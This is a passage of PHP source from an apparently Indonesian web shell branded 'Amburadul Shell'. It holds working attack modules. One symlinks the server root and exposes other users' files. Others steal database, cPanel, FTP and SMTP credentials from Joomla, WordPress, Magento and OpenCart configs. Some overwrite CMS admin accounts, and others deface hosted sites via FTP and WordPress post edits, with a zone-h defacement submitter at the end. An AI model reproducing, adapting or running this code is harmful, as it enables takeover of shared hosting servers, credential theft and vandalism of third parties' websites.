813. if(is_writable($user_jumping_dir)) {
814. $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
815. }
816. echo $jrw;
817. if(function_exists('posix_getpwuid')) {
818. $domain_jump = file_get_contents("/etc/named.conf");
819. if($domain_jump == '') {
820. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
821. } else {
822. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
823. foreach($domains_jump[1] as $dj) {
824. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
825. $user_jumping_url = $user_jumping_url['name'];
826. if($user_jumping_url == $user_idx_jump) {
827. echo " => ( <u>$dj</u> )<br>";
828. break;
829. }
830. }
831. }
832. } else {
833. echo "<br>";
834. }
835. }
836. }
837. }
838. }
839. if($i == 0) {
840. } else {
841. echo "<br>Total ada ".$i." Kamar di ".$ip;
842. }
843. echo "</pre>";
844. }
845. echo "</div>";
846. } elseif($_GET['do'] == 'symlink') {
847. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
848. $d0mains = @file("/etc/named.conf");
849. ##httaces
850. if($d0mains){
851. @mkdir("Cr0tz_Symlink",0777);
852. @chdir("Cr0tz_Symlink");
853. @exe("ln -s / root");
854. $file3 = 'Options Indexes FollowSymLinks
855. DirectoryIndex 0xaN0n.htm
856. AddType text/plain .php
857. AddHandler text/plain .php
858. Satisfy Any';
859. $fp3 = fopen('.htaccess','w');
860. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
861. echo "
862. <table align=center border=1 style='width:60%;border-color:#333333;'>
863. <tr>
864. <td align=center><font size=2>S. No.</font></td>
865. <td align=center><font size=2>Domains</font></td>
866. <td align=center><font size=2>Users</font></td>
867. <td align=center><font size=2>Symlink</font></td>
868. </tr>";
869. $dcount = 1;
870. foreach($d0mains as $d0main){
871. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
872. flush();
873. if(strlen(trim($domains[1][0])) > 2){
874. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
875. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
876. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
877. <td>".$user['name']."</td>
878. <td><a href='$full/Cr0tz_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
879. flush();
880. $dcount++;}}}
881. echo "</table>";
882. }else{
883. $TEST=@file('/etc/passwd');
884. if ($TEST){
885. @mkdir("Cr0tz_Symlink",0777);
886. @chdir("Cr0tz_Symlink");
887. exe("ln -s / root");
888. $file3 = 'Options Indexes FollowSymLinks
889. DirectoryIndex 0xaN0n.htm
890. AddType text/plain .php
891. AddHandler text/plain .php
892. Satisfy Any';
893. $fp3 = fopen('.htaccess','w');
894. $fw3 = fwrite($fp3,$file3);
895. @fclose($fp3);
896. echo "
897. <table align=center border=1><tr>
898. <td align=center><font size=3>S. No.</font></td>
899. <td align=center><font size=3>Users</font></td>
900. <td align=center><font size=3>Symlink</font></td></tr>";
901. $dcount = 1;
902. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
903. while(!feof($file)){
904. $s = fgets($file);
905. $matches = array();
906. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
907. $matches = str_replace("home/","",$matches[1]);
908. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
909. continue;
910. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
911. <td align=center><font class=txt>" . $matches . "</td>";
912. echo "<td align=center><font class=txt><a href=$full/Cr0tz_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
913. $dcount++;}fclose($file);
914. echo "</table>";}else{if($os != "Windows"){@mkdir("Cr0tz_Symlink",0777);@chdir("Cr0tz_Symlink");@exe("ln -s / root");$file3 = '
915. Options Indexes FollowSymLinks
916. DirectoryIndex 0xaN0n.htm
917. AddType text/plain .php
918. AddHandler text/plain .php
919. Satisfy Any
920. ';
921. $fp3 = fopen('.htaccess','w');
922. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
923. echo "
924. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
925. <table align=center border=1><tr>
926. <td align=center><font size=3>ID</font></td>
927. <td align=center><font size=3>Users</font></td>
928. <td align=center><font size=3>Symlink</font></td></tr>";
929. $temp = "";$val1 = 0;$val2 = 1000;
930. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
931. if ($uid)$temp .= join(':',$uid)."\n";}
932. echo '<br/>';$temp = trim($temp);$file5 =
933. fopen("test.txt","w");
934. fputs($file5,$temp);
935. fclose($file5);$dcount = 1;$file =
936. fopen("test.txt", "r") or exit("Unable to open file!");
937. while(!feof($file)){$s = fgets($file);$matches = array();
938. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
939. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
940. continue;
941. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
942. <td align=center><font class=txt>" . $matches . "</td>";
943. echo "<td align=center><font class=txt><a href=$full/Cr0tz_Symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
944. $dcount++;}
945. fclose($file);
946. echo "</table></div></center>";unlink("test.txt");
947. } else
948. echo "<center><font size=3>Cannot create Symlink</font></center>";
949. }
950. }
951. } elseif($_GET['do'] == 'auto_edit_user') {
952. if($_POST['hajar']) {
953. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
954. echo "username atau password harus lebih dari 6 karakter";
955. } else {
956. $user_baru = $_POST['user_baru'];
957. $pass_baru = md5($_POST['pass_baru']);
958. $conf = $_POST['config_dir'];
959. $scan_conf = scandir($conf);
960. foreach($scan_conf as $file_conf) {
961. if(!is_file("$conf/$file_conf")) continue;
962. $config = file_get_contents("$conf/$file_conf");
963. if(preg_match("/JConfig|joomla/",$config)) {
964. $dbhost = ambilkata($config,"host = '","'");
965. $dbuser = ambilkata($config,"user = '","'");
966. $dbpass = ambilkata($config,"password = '","'");
967. $dbname = ambilkata($config,"db = '","'");
968. $dbprefix = ambilkata($config,"dbprefix = '","'");
969. $prefix = $dbprefix."users";
970. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
971. $db = mysql_select_db($dbname);
972. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
973. $result = mysql_fetch_array($q);
974. $id = $result['id'];
975. $site = ambilkata($config,"sitename = '","'");
976. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
977. echo "Config => ".$file_conf."<br>";
978. echo "CMS => Joomla<br>";
979. if($site == '') {
980. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
981. } else {
982. echo "Sitename => $site<br>";
983. }
984. if(!$update OR !$conn OR !$db) {
985. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
986. } else {
987. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
988. }
989. mysql_close($conn);
990. } elseif(preg_match("/WordPress/",$config)) {
991. $dbhost = ambilkata($config,"DB_HOST', '","'");
992. $dbuser = ambilkata($config,"DB_USER', '","'");
993. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
994. $dbname = ambilkata($config,"DB_NAME', '","'");
995. $dbprefix = ambilkata($config,"table_prefix = '","'");
996. $prefix = $dbprefix."users";
997. $option = $dbprefix."options";
998. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
999. $db = mysql_select_db($dbname);
1000. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1001. $result = mysql_fetch_array($q);
1002. $id = $result[ID];
1003. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1004. $result2 = mysql_fetch_array($q2);
1005. $target = $result2[option_value];
1006. if($target == '') {
1007. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1008. } else {
1009. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1010. }
1011. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1012. echo "Config => ".$file_conf."<br>";
1013. echo "CMS => Wordpress<br>";
1014. echo $url_target;
1015. if(!$update OR !$conn OR !$db) {
1016. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1017. } else {
1018. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1019. }
1020. mysql_close($conn);
1021. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1022. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1023. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1024. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1025. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1026. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1027. $prefix = $dbprefix."admin_user";
1028. $option = $dbprefix."core_config_data";
1029. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1030. $db = mysql_select_db($dbname);
1031. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1032. $result = mysql_fetch_array($q);
1033. $id = $result[user_id];
1034. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1035. $result2 = mysql_fetch_array($q2);
1036. $target = $result2[value];
1037. if($target == '') {
1038. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1039. } else {
1040. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1041. }
1042. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1043. echo "Config => ".$file_conf."<br>";
1044. echo "CMS => Magento<br>";
1045. echo $url_target;
1046. if(!$update OR !$conn OR !$db) {
1047. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1048. } else {
1049. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1050. }
1051. mysql_close($conn);
1052. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1053. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1054. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1055. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1056. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1057. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1058. $prefix = $dbprefix."user";
1059. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1060. $db = mysql_select_db($dbname);
1061. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1062. $result = mysql_fetch_array($q);
1063. $id = $result[user_id];
1064. $target = ambilkata($config,"HTTP_SERVER', '","'");
1065. if($target == '') {
1066. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1067. } else {
1068. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1069. }
1070. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1071. echo "Config => ".$file_conf."<br>";
1072. echo "CMS => OpenCart<br>";
1073. echo $url_target;
1074. if(!$update OR !$conn OR !$db) {
1075. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1076. } else {
1077. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1078. }
1079. mysql_close($conn);
1080. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1081. $dbhost = ambilkata($config,'server = "','"');
1082. $dbuser = ambilkata($config,'username = "','"');
1083. $dbpass = ambilkata($config,'password = "','"');
1084. $dbname = ambilkata($config,'database = "','"');
1085. $prefix = "users";
1086. $option = "identitas";
1087. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1088. $db = mysql_select_db($dbname);
1089. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1090. $result = mysql_fetch_array($q);
1091. $target = $result[alamat_website];
1092. if($target == '') {
1093. $target2 = $result[url];
1094. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1095. if($target2 == '') {
1096. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1097. } else {
1098. $cek_login3 = file_get_contents("$target2/adminweb/");
1099. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1100. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1101. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1102. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1103. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1104. } else {
1105. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1106. }
1107. }
1108. } else {
1109. $cek_login = file_get_contents("$target/adminweb/");
1110. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1111. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1112. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1113. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1114. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1115. } else {
1116. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1117. }
1118. }
1119. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1120. echo "Config => ".$file_conf."<br>";
1121. echo "CMS => Lokomedia<br>";
1122. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1123. echo $url_target2;
1124. } else {
1125. echo $url_target;
1126. }
1127. if(!$update OR !$conn OR !$db) {
1128. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1129. } else {
1130. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1131. }
1132. mysql_close($conn);
1133. }
1134. }
1135. }
1136. } else {
1137. echo "<center>
1138. <h1>Auto Edit User Config</h1>
1139. <form method='post'>
1140. DIR Config: <br>
1141. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1142. Set User & Pass: <br>
1143. <input type='text' name='user_baru' value='Acil123' placeholder='user_baru'><br>
1144. <input type='text' name='pass_baru' value='Acil123' placeholder='pass_baru'><br>
1145. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1146. </form>
1147. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1148. ";
1149. }
1150. } elseif($_GET['do'] == 'cpanel') {
1151. if($_POST['crack']) {
1152. $usercp = explode("\r\n", $_POST['user_cp']);
1153. $passcp = explode("\r\n", $_POST['pass_cp']);
1154. $i = 0;
1155. foreach($usercp as $ucp) {
1156. foreach($passcp as $pcp) {
1157. if(@mysql_connect('localhost', $ucp, $pcp)) {
1158. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1159. } else {
1160. $_SESSION[$ucp] = "1";
1161. $_SESSION[$pcp] = "1";
1162. if($ucp == '' || $pcp == '') {
1163.  
1164. } else {
1165. $i++;
1166. if(function_exists('posix_getpwuid')) {
1167. $domain_cp = file_get_contents("/etc/named.conf");
1168. if($domain_cp == '') {
1169. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1170. } else {
1171. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1172. foreach($domains_cp[1] as $dj) {
1173. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1174. $user_cp_url = $user_cp_url['name'];
1175. if($user_cp_url == $ucp) {
1176. $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
1177. break;
1178. }
1179. }
1180. }
1181. } else {
1182. $dom = "<font color=red>function is Disable by system</font>";
1183. }
1184. echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
1185. }
1186. }
1187. }
1188. }
1189. }
1190. if($i == 0) {
1191. } else {
1192. echo "<br>sukses nyolong ".$i." Cpanel by <font color=red>Amburadul Shell.</font>";
1193. }
1194. } else {
1195. echo "<center>
1196. <form method='post'>
1197. USER: <br>
1198. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1199. $_usercp = fopen("/etc/passwd","r");
1200. while($getu = fgets($_usercp)) {
1201. if($getu == '' || !$_usercp) {
1202. echo "<font color=red>Can't read /etc/passwd</font>";
1203. } else {
1204. preg_match_all("/(.*?):x:/", $getu, $u);
1205. foreach($u[1] as $user_cp) {
1206. if(is_dir("/home/$user_cp/public_html")) {
1207. echo "$user_cp\n";
1208. }
1209. }
1210. }
1211. }
1212. echo "</textarea><br>
1213. PASS: <br>
1214. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1215. function cp_pass($dir) {
1216. $pass = "";
1217. $dira = scandir($dir);
1218. foreach($dira as $dirb) {
1219. if(!is_file("$dir/$dirb")) continue;
1220. $ambil = file_get_contents("$dir/$dirb");
1221. if(preg_match("/WordPress/", $ambil)) {
1222. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1223. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1224. $pass .= ambilkata($ambil,"password = '","'")."\n";
1225. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1226. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1227. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1228. $pass .= ambilkata($ambil,'password = "','"')."\n";
1229. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1230. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1231. } elseif(preg_match("/^[client]$/", $ambil)) {
1232. preg_match("/password=(.*?)/", $ambil, $pass1);
1233. if(preg_match('/"/', $pass1[1])) {
1234. $pass1[1] = str_replace('"', "", $pass1[1]);
1235. $pass .= $pass1[1]."\n";
1236. } else {
1237. $pass .= $pass1[1]."\n";
1238. }
1239. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1240. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1241. }
1242. }
1243. echo $pass;
1244. }
1245. $cp_pass = cp_pass($dir);
1246. echo $cp_pass;
1247. echo "</textarea><br>
1248. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1249. </form>
1250. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1251. }
1252. } elseif($_GET['do'] == 'cpftp_auto') {
1253. if($_POST['crack']) {
1254. $usercp = explode("\r\n", $_POST['user_cp']);
1255. $passcp = explode("\r\n", $_POST['pass_cp']);
1256. $i = 0;
1257. foreach($usercp as $ucp) {
1258. foreach($passcp as $pcp) {
1259. if(@mysql_connect('localhost', $ucp, $pcp)) {
1260. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1261. } else {
1262. $_SESSION[$ucp] = "1";
1263. $_SESSION[$pcp] = "1";
1264. if($ucp == '' || $pcp == '') {
1265. //
1266. } else {
1267. echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1268. $ftp_conn = ftp_connect($ip);
1269. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1270. if((!$ftp_login) || (!$ftp_conn)) {
1271. echo "[+] <font color=red>Login Gagal</font><br><br>";
1272. } else {
1273. echo "[+] <font color=white>Login Sukses</font><br>";
1274. $fi = htmlspecialchars($_POST['file_deface']);
1275. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1276. if($deface) {
1277. $i++;
1278. echo "[+] <font color=white>Deface Sukses</font><br>";
1279. if(function_exists('posix_getpwuid')) {
1280. $domain_cp = file_get_contents("/etc/named.conf");
1281. if($domain_cp == '') {
1282. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1283. } else {
1284. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1285. foreach($domains_cp[1] as $dj) {
1286. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1287. $user_cp_url = $user_cp_url['name'];
1288. if($user_cp_url == $ucp) {
1289. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1290. break;
1291. }
1292. }
1293. }
1294. } else {
1295. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1296. }
1297. } else {
1298. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1299. }
1300. }
1301. //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1302. }
1303. }
1304. }
1305. }
1306. }
1307. if($i == 0) {
1308. } else {
1309. echo "<br>sukses Crack".$i." Cpanel by <font color=white>Amburadul Shell.</font>";
1310. }
1311. } else {
1312. echo "<center>
1313. <form method='post'>
1314. Filename: <br>
1315. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1316. Deface Page: <br>
1317. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1318. USER: <br>
1319. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1320. $_usercp = fopen("/etc/passwd","r");
1321. while($getu = fgets($_usercp)) {
1322. if($getu == '' || !$_usercp) {
1323. echo "<font color=red>Can't read /etc/passwd</font>";
1324. } else {
1325. preg_match_all("/(.*?):x:/", $getu, $u);
1326. foreach($u[1] as $user_cp) {
1327. if(is_dir("/home/$user_cp/public_html")) {
1328. echo "$user_cp\n";
1329. }
1330. }
1331. }
1332. }
1333. echo "</textarea><br>
1334. PASS: <br>
1335. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1336. function cp_pass($dir) {
1337. $pass = "";
1338. $dira = scandir($dir);
1339. foreach($dira as $dirb) {
1340. if(!is_file("$dir/$dirb")) continue;
1341. $ambil = file_get_contents("$dir/$dirb");
1342. if(preg_match("/WordPress/", $ambil)) {
1343. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1344. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1345. $pass .= ambilkata($ambil,"password = '","'")."\n";
1346. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1347. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1348. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1349. $pass .= ambilkata($ambil,'password = "','"')."\n";
1350. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1351. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1352. } elseif(preg_match("/client/", $ambil)) {
1353. preg_match("/password=(.*)/", $ambil, $pass1);
1354. if(preg_match('/"/', $pass1[1])) {
1355. $pass1[1] = str_replace('"', "", $pass1[1]);
1356. $pass .= $pass1[1]."\n";
1357. }
1358. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1359. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1360. }
1361. }
1362. echo $pass;
1363. }
1364. $cp_pass = cp_pass($dir);
1365. echo $cp_pass;
1366. echo "</textarea><br>
1367. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1368. </form>
1369. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1370. }
1371. } elseif($_GET['do'] == 'smtp') {
1372. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1373. function scj($dir) {
1374. $dira = scandir($dir);
1375. foreach($dira as $dirb) {
1376. if(!is_file("$dir/$dirb")) continue;
1377. $ambil = file_get_contents("$dir/$dirb");
1378. $ambil = str_replace("$", "", $ambil);
1379. if(preg_match("/JConfig|joomla/", $ambil)) {
1380. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1381. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1382. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1383. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1384. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1385. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1386. echo "SMTP Host: <font color=white>$smtp_host</font><br>";
1387. echo "SMTP port: <font color=white>$smtp_port</font><br>";
1388. echo "SMTP user: <font color=white>$smtp_user</font><br>";
1389. echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
1390. echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
1391. echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
1392. }
1393. }
1394. }
1395. $smpt_hunter = scj($dir);
1396. echo $smpt_hunter;
1397. } elseif($_GET['do'] == 'auto_wp') {
1398. if($_POST['hajar']) {
1399. $title = htmlspecialchars($_POST['new_title']);
1400. $pn_title = str_replace(" ", "-", $title);
1401. if($_POST['cek_edit'] == "Y") {
1402. $script = $_POST['edit_content'];
1403. } else {
1404. $script = $title;
1405. }
1406. $conf = $_POST['config_dir'];
1407. $scan_conf = scandir($conf);
1408. foreach($scan_conf as $file_conf) {
1409. if(!is_file("$conf/$file_conf")) continue;
1410. $config = file_get_contents("$conf/$file_conf");
1411. if(preg_match("/WordPress/", $config)) {
1412. $dbhost = ambilkata($config,"DB_HOST', '","'");
1413. $dbuser = ambilkata($config,"DB_USER', '","'");
1414. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1415. $dbname = ambilkata($config,"DB_NAME', '","'");
1416. $dbprefix = ambilkata($config,"table_prefix = '","'");
1417. $prefix = $dbprefix."posts";
1418. $option = $dbprefix."options";
1419. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1420. $db = mysql_select_db($dbname);
1421. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1422. $result = mysql_fetch_array($q);
1423. $id = $result[ID];
1424. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1425. $result2 = mysql_fetch_array($q2);
1426. $target = $result2[option_value];
1427. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1428. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1429. echo "<div style='margin: 5px auto;'>";
1430. if($target == '') {
1431. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1432. } else {
1433. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1434. }
1435. if(!$update OR !$conn OR !$db) {
1436. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1437. } else {
1438. echo "<font color=white>sukses di ganti bossque.</font><br>";
1439. }
1440. echo "</div>";
1441. mysql_close($conn);
1442. }
1443. }
1444. } else {
1445. echo "<center>
1446. <h1>Auto Edit Title+Content WordPress</h1>
1447. <form method='post'>
1448. DIR Config: <br>
1449. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1450. Set Title: <br>
1451. <input type='text' name='new_title' value='Hacked by Mr.4c1L Cr0tZz' placeholder='New Title'><br><br>
1452. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1453. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1454. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1455. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1456. </form>
1457. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1458. ";
1459. }
1460. } elseif($_GET['do'] == 'zoneh') {
1461. if($_POST['submit']) {
1462. $domain = explode("\r\n", $_POST['url']);
1463. $nick = $_POST['nick'];
1464. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1465. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1466. function zoneh($url,$nick) {
1467. $ch = curl_init("http://www.zone-h.com/notify/single");
1468. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1469. curl_setopt($ch, CURLOPT_POST, true);
